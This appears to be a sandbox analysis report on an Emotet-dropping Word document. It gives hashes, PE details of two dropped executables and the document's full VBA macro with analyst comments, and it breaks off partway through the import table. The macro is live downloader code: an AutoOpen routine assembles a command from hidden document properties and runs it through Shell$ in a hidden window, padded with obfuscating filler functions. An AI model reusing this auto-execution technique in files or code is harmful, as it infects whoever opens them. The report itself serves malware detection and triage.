Word Doc in Attached Email Downloads Emotet | Files
File Information
Sample files count 1
Created files count 4
Modified files count 0
c:\users\atveydl98z\desktop\49343.doc
-
File Properties
Names c:\users\atveydl98z\desktop\49343.doc (Sample File)
Size 89.00 KB (91136 bytes)
Hash Values MD5: 890ce730a3cf43f43039f114744df924
SHA1: 19142bb0a5cdb0a7ad3520d1693ef5f3761d6d9a
SHA256: d9c9e1fece032140a4754096b08a4eb147598a36f8b582c796b8764ff6cd9a91
Actions
VBA Information
+
VBA Properties
Module Count 1
Macro Count 25
Module1.bas - Activate Workbook
+
' Auto-run entry point: Word runs a macro named AutoOpen when the document is
' opened with macros enabled. Its only statement hands control to mFAVwZDEr,
' so everything that function does happens without further user action.
Sub autoopen()
mFAVwZDEr
End Sub
Module1.bas - Eventless
+
' Filler routine (analyst annotation). Declares a local Variant array, stores
' two arithmetic results and the values of identifiers that are never assigned
' anywhere in this listing, then ends without setting a return value.
' No call to KvRCBMNS appears in the listing; the array is discarded on exit.
Function KvRCBMNS()
Dim LMymZeBnT(2529)
LMymZeBnT(1446) = 8729 + 4015 / 7486 / 6644 / 2785 - 4156 + 1671 + 1621
 LMymZeBnT(175) = 6727 + 3749 / 2084 / 6651 / 2226 - 4594 - 2193 + 7969
LMymZeBnT(561) = Bvhvbny
 LMymZeBnT(2449) = GrgGzTyygzg
 LMymZeBnT(1799) = kDeGvDeHBEd
 LMymZeBnT(765) = MwASNGy
 LMymZeBnT(2210) = VcVCSVcBZGR
 LMymZeBnT(2285) = pSsyLnr
 LMymZeBnT(1072) = LaCbgNn
 LMymZeBnT(138) = XGZbySUN
 LMymZeBnT(2342) = PrUzZbaXhNR
 LMymZeBnT(763) = zErXbTBtP
 LMymZeBnT(239) = HdtwfkN
 LMymZeBnT(2464) = dppBDCapf
 LMymZeBnT(2404) = UTNnrHvZh
 LMymZeBnT(435) = zhnYZsSx
End Function
' Filler routine (analyst annotation). Fills a local Variant array with three
' constant arithmetic results and with identifiers that are never assigned in
' this listing, and sets no return value. No call to zxkKZatS is visible here.
Function zxkKZatS()
Dim MUSDsdTpm(8023)
MUSDsdTpm(1547) = 8507 + 3715 + 7390 / 1139 - 7686 - 1394 - 3729 + 5591 + 6346 + 3830
 MUSDsdTpm(5496) = 3179 + 1176 / 7152 - 7866 + 8387 + 7334 + 3666
 MUSDsdTpm(6901) = 3699 + 464 / 2847 / 8537 - 1494 - 4533 - 7135 + 5793 + 991
MUSDsdTpm(2356) = BNVUASu
 MUSDsdTpm(5811) = pfxyacFHhV
 MUSDsdTpm(4778) = nfcVuNST
 MUSDsdTpm(3553) = KKsAPpcZpey
 MUSDsdTpm(6172) = GgertpH
 MUSDsdTpm(3112) = ecTDmEyRUr
 MUSDsdTpm(4214) = aNmezFdLCmu
 MUSDsdTpm(6856) = HcfUURfCg
 MUSDsdTpm(2833) = WuNtuvWUw
 MUSDsdTpm(2854) = xBwvyYZeNk
 MUSDsdTpm(818) = KuCetnGYMS
 MUSDsdTpm(3710) = ADEFKKLExy
 MUSDsdTpm(6523) = caNmUmfBS
 MUSDsdTpm(7145) = TDDMxWGeV
 MUSDsdTpm(4932) = nAYPVLTzHP
 MUSDsdTpm(4723) = MUnbKhhrM
 MUSDsdTpm(2494) = zLeZyXb
 MUSDsdTpm(4785) = aUUbaHB
 MUSDsdTpm(6003) = eLEUnGcHkTH
 MUSDsdTpm(4097) = FgbKwZMY
 MUSDsdTpm(2916) = tnckDDSYY
 MUSDsdTpm(4307) = WHTZHaev
 MUSDsdTpm(6864) = chDaYNWmP
 MUSDsdTpm(2193) = zXxtNNRpD
 MUSDsdTpm(2563) = sbAXRGR
 MUSDsdTpm(6124) = PruYVpHa
 MUSDsdTpm(4923) = VMSzhbAdrVP
 MUSDsdTpm(3938) = bBzmAYNDR
 MUSDsdTpm(1034) = BgFXfTr
 MUSDsdTpm(2729) = xtFvsAKB
End Function
' Filler routine (analyst annotation). Writes two constant arithmetic results
' and a run of never-assigned identifiers into a local Variant array that is
' discarded on exit; no return value is set and no caller is visible here.
Function vwewdzmCG()
Dim dEUUeywwRMF(9690)
dEUUeywwRMF(741) = 1224 + 2152 + 5852 + 9540 / 2903 / 6527 - 9406 - 4708 + 1567 + 2937
 dEUUeywwRMF(7976) = 1014 + 7679 + 3864 + 1676 / 5996 / 3882 - 161 - 4895 + 4065 + 6909
dEUUeywwRMF(1751) = tYazbXxCNT
 dEUUeywwRMF(2776) = NuDCsTAPLPk
 dEUUeywwRMF(1652) = ebvDZPdpZsy
 dEUUeywwRMF(4913) = CUNZMYe
 dEUUeywwRMF(8863) = muZhmRr
 dEUUeywwRMF(5853) = uGsbefvYXRP
 dEUUeywwRMF(9372) = GsVazkZS
 dEUUeywwRMF(3478) = wUmUtLhPy
 dEUUeywwRMF(5719) = egzYLLVHD
 dEUUeywwRMF(3811) = RwfzfLZysD
 dEUUeywwRMF(9051) = ttdrMdsmykS
 dEUUeywwRMF(9395) = ztXFkXHNseL
 dEUUeywwRMF(1518) = cvYaAvhk
 dEUUeywwRMF(4598) = PNWXuHhs
 dEUUeywwRMF(2545) = svkArnN
 dEUUeywwRMF(7865) = szvzSgamBf
 dEUUeywwRMF(7016) = hDwHTMuptC
 dEUUeywwRMF(6991) = WMZUUYPwhZ
 dEUUeywwRMF(542) = hpWXAwLmLYv
 dEUUeywwRMF(2487) = HBeVWrpAB
 dEUUeywwRMF(4899) = CPRYAdHwkTZ
 dEUUeywwRMF(8603) = mFCdEgmrgr
 dEUUeywwRMF(878) = YWPDTErH
 dEUUeywwRMF(8488) = vnMHNnRnT
 dEUUeywwRMF(9551) = WnPmpFADzEX
 dEUUeywwRMF(9252) = azxrthzrfP
 dEUUeywwRMF(5148) = rmYSZsceykH
 dEUUeywwRMF(8137) = MEfWGVkRHfT
 dEUUeywwRMF(9256) = AMvBduVrX
 dEUUeywwRMF(1474) = CSERTFBTLe
End Function
' Filler routine (analyst annotation). Only populates a local Variant array
' with constant arithmetic and never-assigned identifiers; it sets no return
' value and no call to VWLBafszR appears in this listing.
Function VWLBafszR()
Dim RutsTCMXc(5215)
RutsTCMXc(2810) = 8562 + 4583 / 4600 / 3484 - 5235 + 7632 + 2021 + 4246
 RutsTCMXc(2322) = 2401 + 8364 / 9723 / 8683 - 2930 - 2116 - 6859 + 2276
RutsTCMXc(1777) = muWFmKYxd
 RutsTCMXc(3509) = RnXZbXGP
 RutsTCMXc(2132) = uFYaLHHRa
 RutsTCMXc(2659) = MVxPwWed
 RutsTCMXc(1382) = MfBFrLSEZsF
 RutsTCMXc(279) = epAYkRUaV
 RutsTCMXc(2919) = rBAPsgdUZ
 RutsTCMXc(1271) = BydDuUZ
 RutsTCMXc(4350) = eXPPkeHc
 RutsTCMXc(4191) = CTKSnCpP
 RutsTCMXc(4786) = BNYVMbtApGu
 RutsTCMXc(531) = xGnSxTRUCVa
 RutsTCMXc(622) = dYWMfDUyyK
 RutsTCMXc(301) = aGVZYRSnx
 RutsTCMXc(3437) = bEGAMUGxvgk
 RutsTCMXc(3741) = KxxfKfX
 RutsTCMXc(1193) = ptuahxcHBz
 RutsTCMXc(1852) = rmCaPECXAu
 RutsTCMXc(123) = xufwffWkrc
 RutsTCMXc(437) = aaPgrXw
 RutsTCMXc(3292) = SKbvGnhS
 RutsTCMXc(1731) = eYcwdnsX
 RutsTCMXc(1743) = BDeSczbE
 RutsTCMXc(1081) = AggzftDa
 RutsTCMXc(2272) = HBgDyzXDZa
 RutsTCMXc(4215) = tENAmBtgdhY
 RutsTCMXc(3034) = UUWXKseGHdk
End Function
' Filler routine (analyst annotation). Assigns constant arithmetic and
' never-assigned identifiers to a local Variant array, then exits with no
' return value; no caller is visible in this listing.
Function VBnCAbnNA()
Dim HEBZKuBYs(1038)
HEBZKuBYs(566) = 7669 + 5422 / 2359 - 4617 - 8412 + 7694 + 7153
 HEBZKuBYs(896) = 5407 + 6133 + 3574 / 6418 / 7058 - 4982 + 6805 + 5256
HEBZKuBYs(393) = TtEggSfgeCN
 HEBZKuBYs(636) = gyzccGWxFp
 HEBZKuBYs(176) = KzSesWabM
 HEBZKuBYs(837) = zzbHRGa
 HEBZKuBYs(486) = VufauuEmMpX
 HEBZKuBYs(883) = eDzWdVLg
End Function
' Filler routine (analyst annotation). One constant arithmetic result and a
' list of never-assigned identifiers are written to a local Variant array;
' nothing is returned and no call to mcfddkHaRzY appears in this listing.
Function mcfddkHaRzY()
Dim VBcavUmheGY(8954)
VBcavUmheGY(7304) = 5033 + 4668 + 3657 / 6914 / 1788 - 3016 - 1737 + 9932 + 2778
VBcavUmheGY(5594) = sTvMcDSxUU
 VBcavUmheGY(6590) = xpVuRsyAb
 VBcavUmheGY(2946) = bugpEzBrT
 VBcavUmheGY(8332) = LATcDUEwB
 VBcavUmheGY(6907) = BYrVSELc
 VBcavUmheGY(3965) = NEUUxewLxk
 VBcavUmheGY(5006) = kvCHgknFZS
 VBcavUmheGY(746) = kahUVCFWCR
 VBcavUmheGY(8703) = xbVCbtry
 VBcavUmheGY(2015) = EbVSUGYk
 VBcavUmheGY(4569) = vgKCpged
 VBcavUmheGY(5257) = MetYFHuGhEw
 VBcavUmheGY(8613) = cgtGDutgbp
 VBcavUmheGY(3875) = SWRBhexK
 VBcavUmheGY(393) = DBFDbNL
 VBcavUmheGY(4240) = MdVskUh
 VBcavUmheGY(4897) = TMKwFZTGeE
 VBcavUmheGY(138) = nWFzRFr
End Function
' Filler routine (analyst annotation). Populates a local Variant array with
' one constant arithmetic result and never-assigned identifiers, sets no
' return value, and is not called anywhere in this listing.
Function nsYNNXGv()
Dim DYRUtBvbK(532)
DYRUtBvbK(345) = 991 + 194 + 7456 / 9784 / 746 - 5902 - 7887 - 6927 + 7317
DYRUtBvbK(415) = ghrKkkRde
 DYRUtBvbK(514) = PBHPfvPhHNe
 DYRUtBvbK(468) = FgKhcgnma
 DYRUtBvbK(328) = SthLyrmy
 DYRUtBvbK(235) = WmNBZFRv
 DYRUtBvbK(306) = yhDtevr
 DYRUtBvbK(264) = WPMEhPg
 DYRUtBvbK(430) = hTTUHcMK
 DYRUtBvbK(147) = LHwnwLE
 DYRUtBvbK(82) = XtYTgmwBhMc
 DYRUtBvbK(72) = ERkVKEVtPpM
 DYRUtBvbK(230) = ahFxfWemW
 DYRUtBvbK(303) = dxpctLf
 DYRUtBvbK(317) = vFsGUnxTA
 DYRUtBvbK(300) = GDZASPEGR
 DYRUtBvbK(379) = AKshmcmevB
 DYRUtBvbK(292) = UvsZXwWAHm
 DYRUtBvbK(188) = KrEWRBSHtt
 DYRUtBvbK(243) = nMEbcEHXSx
 DYRUtBvbK(223) = nbZNpnZVr
 DYRUtBvbK(173) = cHRkKXmyUn
 DYRUtBvbK(274) = DSWCGvbeyn
 DYRUtBvbK(315) = fPTAyDgrenS
 DYRUtBvbK(265) = LWuBUcc
 DYRUtBvbK(476) = tXEFLaMRh
End Function
' Filler routine (analyst annotation). Stores constant arithmetic and
' never-assigned identifiers in a local Variant array (index 593 is written
' twice); no return value is set and no caller is visible in this listing.
Function zmREnrvEYu()
Dim ELMswbgSnE(1680)
ELMswbgSnE(1477) = 9904 + 2297 / 1124 / 9048 - 4243 - 6734 + 3359 + 6342
 ELMswbgSnE(1419) = 1915 + 7210 + 4448 + 9234 / 2231 - 1549 + 8474 + 1677
ELMswbgSnE(96) = nRYdzbE
 ELMswbgSnE(914) = tgVnfYgyN
 ELMswbgSnE(654) = VcvYAHP
 ELMswbgSnE(1116) = FCLuHaaetgR
 ELMswbgSnE(333) = gHDFRxY
 ELMswbgSnE(134) = sfaynHnhB
 ELMswbgSnE(1389) = PFXgnWyhEf
 ELMswbgSnE(364) = ttfPwgNxybL
 ELMswbgSnE(859) = EBCVcuw
 ELMswbgSnE(1010) = HPvUWtXgWHu
 ELMswbgSnE(593) = zhHaZXTg
 ELMswbgSnE(269) = vaEhAwumaf
 ELMswbgSnE(593) = mRZHPgyAh
 ELMswbgSnE(1520) = YryTsHWKrY
 ELMswbgSnE(1340) = xTAytcLHKv
 ELMswbgSnE(1119) = ZVwtTzD
 ELMswbgSnE(736) = CtLMRdAw
 ELMswbgSnE(1510) = CdRKwFPVVZd
 ELMswbgSnE(1666) = tYPUkkX
 ELMswbgSnE(1594) = wwdYxHVm
 ELMswbgSnE(1102) = BTEwvAnrhrg
 ELMswbgSnE(1413) = RnGstPkfa
 ELMswbgSnE(923) = ZyxphrX
End Function
' Filler routine (analyst annotation). A local Variant array receives one
' constant arithmetic result and a series of never-assigned identifiers;
' the function sets no return value and has no caller in this listing.
Function uRXuyvw()
Dim NKpMEazMxCc(420)
NKpMEazMxCc(112) = 3683 + 6261 / 7797 / 6831 / 4209 - 4881 + 8386
NKpMEazMxCc(353) = NWrfKTSfy
 NKpMEazMxCc(381) = mutCKSC
 NKpMEazMxCc(171) = SURgwHuBa
 NKpMEazMxCc(417) = zmtwAza
 NKpMEazMxCc(354) = sLcwxdGNu
 NKpMEazMxCc(65) = RMWWdMamX
 NKpMEazMxCc(349) = ETNWwUwV
 NKpMEazMxCc(139) = atvsdKU
 NKpMEazMxCc(367) = VeWKNexZFmR
 NKpMEazMxCc(70) = ZUCWAyMN
 NKpMEazMxCc(263) = LFUWuwWzyAA
 NKpMEazMxCc(271) = sFUwyZeC
 NKpMEazMxCc(314) = NYxbtZtt
 NKpMEazMxCc(93) = SRhKnYNyurG
 NKpMEazMxCc(351) = beybhBFd
 NKpMEazMxCc(306) = atWvfThC
 NKpMEazMxCc(207) = SCXCLGDwLzz
End Function
' Filler routine (analyst annotation). Writes two constant arithmetic results
' and never-assigned identifiers into a local Variant array and returns
' nothing; no call to DWEspxAgu appears in this listing.
Function DWEspxAgu()
Dim xRZUfunPFD(3132)
xRZUfunPFD(907) = 2187 + 5300 + 4799 + 1966 / 3758 - 6886 - 2355 - 4481 + 166
 xRZUfunPFD(1784) = 5432 + 2194 / 3622 - 2440 - 6330 - 187 + 7893 + 2485
xRZUfunPFD(1510) = tPrtZveVDy
 xRZUfunPFD(2683) = TdSFCLxuYvU
 xRZUfunPFD(725) = HxrURBTtv
 xRZUfunPFD(223) = ZuYEbVR
 xRZUfunPFD(2897) = WvenubUXvN
 xRZUfunPFD(1055) = HkwZXKKGCz
 xRZUfunPFD(1675) = LZXeNwazXMT
 xRZUfunPFD(436) = fbzCZpw
 xRZUfunPFD(1124) = mKzREcTYBA
 xRZUfunPFD(503) = WugZRrTdCAh
 xRZUfunPFD(986) = LTFffgnEz
 xRZUfunPFD(166) = eMLwDdXp
 xRZUfunPFD(1451) = txMEZpzc
 xRZUfunPFD(2215) = hfmbmCPKgSw
End Function
' Returns the value of the document's custom property whose name is passed in
' VHabMPRv. The three arithmetic assignments go to locals that are never read
' again (filler).
' Analyst note: the strings this macro works with are read from document
' metadata rather than from literals in the VBA source, so the document's
' custom properties have to be reviewed together with the macro during triage;
' scanning the macro text alone will not show them.
Public Function SzxKTBtfzUZ(VHabMPRv)
KdxXEYNMGz = 3254 + 5809 + 2718 + 9580 / 8486 / 5877 - 7362 - 5488 - 6909 + 199 + 4239 + 3011
 xVUysvHR = 5588 + 4126 + 3664 + 9802 / 9108 / 4468 / 8681 - 1541 - 6105 + 9362 + 6047
 HKgDWchDY = 5884 + 4153 + 6710 / 7679 - 4433 - 2432 - 1493 + 246 + 5269
' The only line with an effect: look up the named custom property and return it.
SzxKTBtfzUZ = ActiveDocument.CustomDocumentProperties(VHabMPRv)
End Function
' Assembles one string from document metadata and returns it. The pieces are
' nine custom document properties (read through SzxKTBtfzUZ) followed by the
' built-in "Comments" property. mFAVwZDEr passes the result to VBA.Shell$.
' Every assignment of a pure arithmetic expression below writes a local that is
' never read again (filler). The bare identifiers mixed into the concatenations
' (gxNUmgtWxGM ... zWtcLfDZ, rtnNnpKD) are never assigned in this listing;
' presumably they are Empty and contribute nothing to the string.
' Analyst note: the resulting text is not visible in the macro source; it has
' to be recovered from the properties of the document itself.
Public Function bktLAfLdCk()
kMfPvfp = 3845 + 9649 + 6684 + 5627 / 3420 / 7360 - 163 - 5156 - 3966 + 3070 + 8973 + 9252
' Second part of the final string: four custom properties joined in this order.
npTbERzMkYx = SzxKTBtfzUZ("UDgGzdZfCck") + SzxKTBtfzUZ("gDVvfVFdYuf") + SzxKTBtfzUZ("cvNpMeMWfd") + SzxKTBtfzUZ("MSsHVeXmKLY")
TFGxZFCHzN = 1863 + 5422 + 1255 / 3353 / 9002 - 1247 + 9005 + 639 + 4276
 wWVCzWA = 3228 + 6907 + 6576 / 555 / 8586 / 6752 - 4602 - 7940 + 9347 + 7736 + 1226
 rrcsHyFa = 1322 + 1741 + 7568 / 3901 / 9838 / 6404 - 6983 + 5251 + 7894
 KnCDGVfwkb = 7712 + 8204 + 7466 / 1856 / 7216 / 7690 - 9783 - 3000 + 6775 + 5094
 rNcAXrs = 4864 + 6088 + 8970 / 6897 - 8071 - 9068 + 6229
 pPkzAma = 5551 + 9141 + 6155 / 9096 / 4604 / 2405 - 8678 - 9693 - 4251 + 7642 + 3026 + 2441
 xfzYTEPCRLb = 5532 + 3486 / 5846 / 5546 / 6562 - 4732 + 7462
 YFBLePxRLdm = 6798 + 6895 + 6266 / 6181 / 1193 / 7752 - 817 - 7320 + 9904
 RDKwUdLed = 162 + 1695 + 9676 / 6583 / 6277 / 2866 - 8600 - 8400 - 1249 + 1646
' First part of the final string: two custom properties, the unassigned filler
' identifiers, then three more custom properties.
TFewfMhzR = SzxKTBtfzUZ("NPnrvuZ") + SzxKTBtfzUZ("TZgPnVEb") + gxNUmgtWxGM + NTmebYUL + aRwMduN + xpZSkkRz + ZvStsRF + PWwDgrB + bDPRdLpa + bNWzAbXfdBp + PHuvNFLBmA + zWtcLfDZ + SzxKTBtfzUZ("RdMTHNLBL") + SzxKTBtfzUZ("KWPswMv") + SzxKTBtfzUZ("SxxdKKYSSM")
HuPgEfxZTv = 8014 + 4923 + 2713 / 520 / 4052 / 4286 - 9954 + 4093 + 2101 + 2193
 SvmLeKEWV = 3289 + 1483 + 3558 / 6135 / 7890 / 7580 - 3873 - 6680 - 5486 + 8437 + 2446 + 7214
' Join the two parts: the five-property part comes before the four-property part.
UNTEwnDp = TFewfMhzR + npTbERzMkYx
nYGuBFmsZe = 1672 + 3032 + 7196 + 887 / 5821 - 5743 - 3896 - 2994 + 875 + 4336
 mguystETn = 2577 + 7968 + 4919 / 9034 - 4707 - 1445 - 5135 + 3290 + 6217
 YSRwUEaa = 1991 + 1487 / 4345 / 1911 / 7132 - 5481 - 2082 - 3352 + 9675
 uUBFDBpWbC = 4248 + 1563 + 3266 + 3546 / 9980 - 4936 + 6992
 eBEcYMf = 9045 + 6209 / 7831 / 2928 / 298 - 1459 + 3548 + 496 + 873
' Return value: the joined custom properties followed by the document's
' built-in "Comments" field (plus the unassigned filler identifiers).
bktLAfLdCk = UNTEwnDp + ActiveDocument.BuiltInDocumentProperties("Comments") + gxNUmgtWxGM + NTmebYUL + aRwMduN + xpZSkkRz + ZvStsRF + PWwDgrB + bDPRdLpa + bNWzAbXfdBp + PHuvNFLBmA + zWtcLfDZ + rtnNnpKD
End Function
' Returns the concatenation of three custom document properties read through
' SzxKTBtfzUZ. The arithmetic assignments above the return line write locals
' that are never read again (filler).
' No call to YxvxhhMgSFb appears in this listing, so its result does not reach
' the VBA.Shell$ call as far as the visible code shows.
Public Function YxvxhhMgSFb()
FavmyWKsL = 1610 + 5119 + 687 + 7277 / 6870 / 3128 / 5309 - 397 - 2390 - 4527 + 1609
 EvyeWsTdFB = 6063 + 9665 / 3767 - 2628 + 7455 + 5809 + 1681
 BgMbuVWDDVR = 8909 + 5467 + 2579 + 4716 / 3342 / 5961 / 799 - 4420 - 3935 + 3120 + 240 + 6310
 kYsWbUN = 6046 + 2797 + 7601 / 9911 / 8508 - 4655 - 9530 - 7683 + 8231
 hXkUGNy = 3400 + 6950 + 5761 / 4545 / 7085 - 2310 - 5136 - 3447 + 3015 + 5366
 cvSssYG = 7935 + 9099 + 2758 / 1771 - 688 + 1314 + 3495 + 5707
 sAAWHuwKT = 3351 + 4084 + 6878 / 3317 - 4988 - 868 + 6841
YxvxhhMgSFb = SzxKTBtfzUZ("XpkwnxwTANb") + SzxKTBtfzUZ("ZxdCPxP") + SzxKTBtfzUZ("erxFtYrPrH")
End Function
' Execution step of the macro, called from autoopen. Passes the string built
' by bktLAfLdCk to VBA.Shell$, which starts it as a new process; the second
' argument 0 is the hidden-window style (vbHide), so no window is shown.
' The three arithmetic assignments are filler, and the bare identifiers in the
' concatenation are never assigned in this listing (presumably Empty).
' Analyst note: the command text is not in the macro source; it comes from the
' document properties read by bktLAfLdCk. The observable behaviour to detect is
' the Office application starting a child process when the document is opened.
Public Function mFAVwZDEr()
NHMuXYT = 7890 + 9008 / 5012 / 1995 / 8568 - 6298 + 1589
 gxbgZpEr = 6668 + 4130 + 2846 + 4614 / 3298 - 8533 - 4357 + 616 + 2491 + 7282
 ZKrWVeu = 5437 + 7407 + 4988 / 8718 / 1532 / 2038 - 8085 + 4298 + 4938 + 6245
VBA.Shell$ bktLAfLdCk + gxNUmgtWxGM + NTmebYUL + aRwMduN + xpZSkkRz + ZvStsRF + PWwDgrB + bDPRdLpa + bNWzAbXfdBp + PHuvNFLBmA + zWtcLfDZ + umLbPFhprKh, 0
End Function

' Filler routine (analyst annotation). Stores one constant arithmetic result
' and one never-assigned identifier in a local Variant array; it returns
' nothing and no call to MZBKGfp appears in this listing.
Function MZBKGfp()
Dim KrBTZNA(8153)
KrBTZNA(5963) = 7122 + 527 + 6654 + 8388 / 2783 - 6758 + 560
KrBTZNA(1548) = ELXXNCKV
End Function
' Filler routine (analyst annotation). Three constant arithmetic results and
' one never-assigned identifier are written to a local Variant array that is
' discarded on exit; no return value is set and no caller is visible here.
Function eGBaPury()
Dim PUdNVKKYsBy(8375)
PUdNVKKYsBy(2001) = 5154 + 8186 / 281 / 1463 - 1676 - 7888 + 4258 + 9082 + 4974
 PUdNVKKYsBy(4902) = 7943 + 6373 / 587 - 1282 - 5679 - 516 + 6707 + 4687
 PUdNVKKYsBy(3865) = 2647 + 8864 + 7095 + 2109 / 5917 - 724 - 3685 - 9045 + 3888 + 701 + 8349
PUdNVKKYsBy(1239) = sfVUrYXwUmT
End Function
' Filler routine (analyst annotation). Writes one constant arithmetic result
' and two never-assigned identifiers into a local Variant array; it sets no
' return value and is not called anywhere in this listing.
Function DSZpDyc()
Dim BMzbGGAz(2552)
BMzbGGAz(2373) = 4303 + 4438 / 9833 / 8918 / 9789 - 3607 - 8474 - 9143 + 6689 + 3366
BMzbGGAz(1082) = tpYAKLa
 BMzbGGAz(2547) = XUUNMZVsG
End Function
' Filler routine (analyst annotation). Fills a local Variant array with three
' constant arithmetic results and three never-assigned identifiers, returns
' nothing, and has no caller in this listing.
Function dgdDpMkuBM()
Dim tXfTpPKpw(9202)
tXfTpPKpw(876) = 1050 + 1628 / 1092 - 8284 + 1141 + 4463 + 1384
 tXfTpPKpw(4552) = 2444 + 6718 + 3809 / 2757 - 4122 - 9431 + 4963 + 949 + 7620
 tXfTpPKpw(1209) = 2028 + 5594 + 7240 / 1857 / 1779 - 8596 - 9918 + 4965
tXfTpPKpw(6755) = AvHYHdG
 tXfTpPKpw(2750) = mEbgScdEuMM
 tXfTpPKpw(3506) = TXskPtY
End Function
' Filler routine (analyst annotation). Three constant arithmetic results and
' one never-assigned identifier go into a local Variant array; no return
' value is set and no call to sVrCPtvhyn appears in this listing.
Function sVrCPtvhyn()
Dim hgcCLPgsPk(8203)
hgcCLPgsPk(6548) = 1867 + 3494 + 5144 / 8569 / 9221 / 6427 - 2823 - 7982 - 900 + 8337 + 3607 + 7123
 hgcCLPgsPk(4189) = 7479 + 4004 / 5285 / 2717 - 2016 - 1108 + 2820 + 1751
 hgcCLPgsPk(6289) = 7444 + 1710 / 590 / 7445 - 6055 + 4114 + 2437
hgcCLPgsPk(3779) = EUMbxezCDww
End Function
' Filler routine (analyst annotation). Assigns two constant arithmetic results
' and four never-assigned identifiers to a local Variant array, then exits
' without a return value; no caller is visible in this listing.
Function mKMPmybePB()
Dim vubfFfrdHe(1423)
vubfFfrdHe(218) = 2608 + 6474 / 2911 / 3470 - 8849 - 6073 + 5326 + 3977
 vubfFfrdHe(1420) = 1789 + 5680 / 2098 / 7617 / 2639 - 9725 - 7647 + 7970
vubfFfrdHe(1034) = MpmcwxKYA
 vubfFfrdHe(361) = yvexypTdVw
 vubfFfrdHe(753) = NFebFNfWDUn
 vubfFfrdHe(415) = Cyzpwmy
End Function
' Filler routine (analyst annotation). One constant arithmetic result and four
' never-assigned identifiers are stored in a local Variant array; the function
' returns nothing and is not called anywhere in this listing.
Function phRPtNpZ()
Dim URBgEfRvHv(5460)
URBgEfRvHv(1542) = 5717 + 9843 / 8989 - 4743 - 3188 - 5575 + 7743
URBgEfRvHv(3537) = HSeCSvfs
 URBgEfRvHv(2267) = gPWcUArMfCs
 URBgEfRvHv(166) = KzPvKEYLRX
 URBgEfRvHv(192) = SmtgtDmaeBW
End Function
' Filler routine (analyst annotation). Writes four constant arithmetic results
' and three never-assigned identifiers into a local Variant array; no return
' value is set and no call to CTHgdDf appears in this listing.
Function CTHgdDf()
Dim UnKcLwMwBVT(4050)
UnKcLwMwBVT(2954) = 9024 + 5486 + 595 / 6471 - 8360 - 8734 - 1582 + 3917 + 3259 + 8377
 UnKcLwMwBVT(1058) = 213 + 8914 / 5422 / 1500 - 4766 + 4321 + 1339
 UnKcLwMwBVT(3433) = 2033 + 7035 + 7154 + 2366 / 4264 / 8297 / 6453 - 961 - 3605 + 2372 + 3767
 UnKcLwMwBVT(426) = 3158 + 8753 + 2257 / 925 / 8889 - 3976 - 9535 + 7950 + 1520 + 699
UnKcLwMwBVT(3899) = AgNvaNrzGB
 UnKcLwMwBVT(605) = ALFSNeH
 UnKcLwMwBVT(3769) = xdytHBD
End Function
' Filler routine (analyst annotation). Populates a local Variant array with
' three constant arithmetic results and four never-assigned identifiers,
' returns nothing, and has no caller in this listing.
Function SVLeRzys()
Dim HTnMuZBK(4251)
HTnMuZBK(1828) = 5507 + 9270 + 6482 / 8883 - 7397 - 4137 + 6460 + 873 + 5343
 HTnMuZBK(3200) = 3606 + 7667 + 9983 / 7114 / 68 - 1992 - 8442 - 8901 + 3508 + 8115 + 1729
 HTnMuZBK(2035) = 5750 + 8955 / 2572 / 4772 / 9121 - 5063 - 1854 + 7277 + 5682
HTnMuZBK(675) = gRfmczbcsVb
 HTnMuZBK(2504) = FXEgcmwmEHm
 HTnMuZBK(1552) = FnXAazds
 HTnMuZBK(3060) = ZHdXXxu
End Function
' Filler routine (analyst annotation). Three constant arithmetic results and
' three never-assigned identifiers are written to a local Variant array that
' is discarded on exit; no return value is set and no caller is visible here.
Function TGgHgym()
Dim TrTyEurgdh(7434)
TrTyEurgdh(1913) = 6199 + 1949 + 5209 / 4349 - 3974 - 7133 + 4658
 TrTyEurgdh(593) = 853 + 3617 + 8058 / 7151 / 3146 / 7021 - 6339 - 4379 + 3455 + 8346
 TrTyEurgdh(3389) = 3185 + 995 / 8137 - 830 - 4690 + 9750 + 9135 + 2635
TrTyEurgdh(1832) = fpnkdFBeUw
 TrTyEurgdh(5922) = yXUGsyH
 TrTyEurgdh(3913) = vEwaCvtUg
End Function
c:\users\atveydl98z\appdata\local\temp\38763.exe, ...
-
File Properties
Names c:\users\atveydl98z\appdata\local\temp\38763.exe (Created File)
c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe (Created File)
Size 84.00 KB (86016 bytes)
Hash Values MD5: 1b1e6729790854252dfba6c77f198a4e
SHA1: 327c94b435802f77d12913956b28c70d00ab2de5
SHA256: 3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98
Actions
PE Information
+
File Properties
Image Base 0x400000
Entry Point 0x401390
Size Of Code 0x3000
Size Of Initialized Data 0x12000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2017-08-31 15:34:18
Compiler/Packer Unknown
Sections (4)
+
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x2761 0x3000 0x1000 CNT_CODE, MEM_EXECUTE, MEM_READ 5.65
.rdata 0x404000 0x50c 0x1000 0x4000 CNT_INITIALIZED_DATA, MEM_READ 1.83
.data 0x405000 0x10e8 0x1000 0x5000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 0.43
y 0x407000 0xe009 0xf000 0x6000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 7.67
Imports (21)
+
WINSPOOL.DRV (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
DeletePrintProcessorA 0x0 0x40405c 0x42ec 0x42ec
GDI32.dll (2)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
GetTextExtentExPointI 0x0 0x404000 0x4290 0x4290
GetTextFaceA 0x0 0x404004 0x4294 0x4294
OLEAUT32.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
LoadTypeLib 0xa1 0x404054 0x42e4 0x42e4
KERNEL32.dll (17)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
LoadLibraryA 0x0 0x40400c 0x429c 0x429c
GetConsoleCP 0x0 0x404010 0x42a0 0x42a0
GetLastError 0x0 0x404014 0x42a4 0x42a4
InterlockedExchange 0x0 0x404018 0x42a8 0x42a8
GetCommandLineA 0x0 0x40401c 0x42ac 0x42ac
HeapFree 0x0 0x404020 0x42b0 0x42b0
GetConsoleCursorInfo 0x0 0x404024 0x42b4 0x42b4
